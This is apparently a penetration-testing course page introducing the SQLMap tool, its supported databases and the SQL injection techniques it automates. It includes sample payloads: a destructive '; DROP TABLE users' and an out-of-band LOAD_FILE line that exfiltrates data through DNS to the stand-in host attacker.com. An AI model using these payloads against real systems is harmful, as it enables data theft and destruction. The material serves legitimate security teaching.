# SQLMap Essentials [SQLMap](https://github.com/sqlmapproject/sqlmap) is a free and open-source penetration testing tool written in Python that automates the process of detecting and exploiting SQL injection (SQLi) flaws. SQLMap has been continuously developed since 2006 and is still maintained today. ``` python sqlmap.py -u 'http://inlanefreight.htb/page.php?id=5' ``` SQLMap comes with a powerful detection engine, numerous features, and a broad range of options and switches for fine-tuning the many aspects of it, such as: | | | | | -------------------------- | ------------------- | ------------------------------------------------------ | | Target connection | Injection detection | Fingerprinting | | Enumeration | Optimization | Protection detection and bypass using "tamper" scripts | | Database content retrieval | File system access | Execution of the operating system (OS) commands | ### SQLMap Installation ```shell-session sudo apt install sqlmap git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev python sqlmap.py ``` ### Supported Databases SQLMap has the largest support for DBMSes of any other SQL exploitation tool. SQLMap fully supports the following DBMSes:
| | | | | | ------------------ | -------------------- | ------------------ | ---------------------- | | `MySQL` | `Oracle` | `PostgreSQL` | `Microsoft SQL Server` | | `SQLite` | `IBM DB2` | `Microsoft Access` | `Firebird` | | `Sybase` | `SAP MaxDB` | `Informix` | `MariaDB` | | `HSQLDB` | `CockroachDB` | `TiDB` | `MemSQL` | | `H2` | `MonetDB` | `Apache Derby` | `Amazon Redshift` | | `Vertica`, `Mckoi` | `Presto` | `Altibase` | `MimerSQL` | | `CrateDB` | `Greenplum` | `Drizzle` | `Apache Ignite` | | `Cubrid` | `InterSystems Cache` | `IRIS` | `eXtremeDB` | | `FrontBase` | | | | SQLMap is the only penetration testing tool that can properly detect and exploit all known SQLi types. We see the types of SQL injections supported by SQLMap with the `sqlmap -hh` command: ```shell-session sqlmap -hh ``` The technique characters `BEUSTQ` refers to the following: * `B`: Boolean-based blind * `E`: Error-based * `U`: Union query-based * `S`: Stacked queries * `T`: Time-based blind * `Q`: Inline queries ### Boolean-based blind SQL Injection SQLMap exploits `Boolean-based blind SQL Injection` vulnerabilities through the differentiation of `TRUE` from `FALSE` query results, effectively retrieving 1 byte of information per request. This ranges from fuzzy comparisons of raw response content, HTTP codes, page titles, filtered text, and other factors. * `TRUE` results are generally based on responses having none or marginal difference to the regular server response. * `FALSE` results are based on responses having substantial differences from the regular server response. * `Boolean-based blind SQL Injection` is considered as the most common SQLi type in web applications. ### Error-based SQL Injection Example of `Error-based SQL Injection`: ```sql AND GTID_SUBSET(@@version,0) ``` If the `database management system` (`DBMS`) errors are being returned as part of the server response for any database-related problems, then there is a probability that they can be used to carry the results for requested queries. In such cases, specialized payloads for the current DBMS are used, targeting the functions that cause known misbehaviors. SQLMap has the most comprehensive list of such related payloads and covers `Error-based SQL Injection` for the following DBMSes: | MySQL | PostgreSQL | Oracle | | -------------------- | ---------- | ------- | | Microsoft SQL Server | Sybase | Vertica | | IBM DB2 | Firebird | MonetDB | ### UNION query-based Example of `UNION query-based SQL Injection`: ```sql UNION ALL SELECT 1,@@version,3 ``` ### Stacked queries Example of `Stacked Queries`: ```sql ; DROP TABLE users ``` Stacking SQL queries, also known as the "piggy-backing," is the form of injecting additional SQL statements after the vulnerable one ### Time-based blind SQL Injection Example of `Time-based blind SQL Injection`: ```sql AND 1=IF(2>1,SLEEP(5),0) ``` The principle of `Time-based blind SQL Injection` is similar to the `Boolean-based blind SQL Injection`, but here the response time is used as the source for the differentiation between `TRUE` or `FALSE`. * `TRUE` response is generally characterized by the noticeable difference in the response time compared to the regular server response * `FALSE` response should result in a response time indistinguishable from regular response times ### Inline queries Example of `Inline Queries`: ```sql SELECT (SELECT @@version) from ``` This type of injection embedded a query within the original query. Such SQL injection is uncommon, as it needs the vulnerable web app to be written in a certain way. Still, SQLMap supports this kind of SQLi as well. ### Out-of-band SQL Injection Example of `Out-of-band SQL Injection`: ```sql LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt')) ``` This is considered one of the most advanced types of SQLi, used in cases where all other types are either unsupported by the vulnerable web application or are too slow (e.g., time-based blind SQLi). SQLMap supports out-of-band SQLi through "DNS exfiltration," where requested queries are retrieved through DNS traffic. By running the SQLMap on the DNS server for the domain under control (e.g. `.attacker.com`), SQLMap can perform the attack by forcing the server to request non-existent subdomains (e.g. `foo.attacker.com`), where `foo` would be the SQL response we want to receive. SQLMap can then collect these erroring DNS requests and collect the `foo` part, to form the entire SQL response.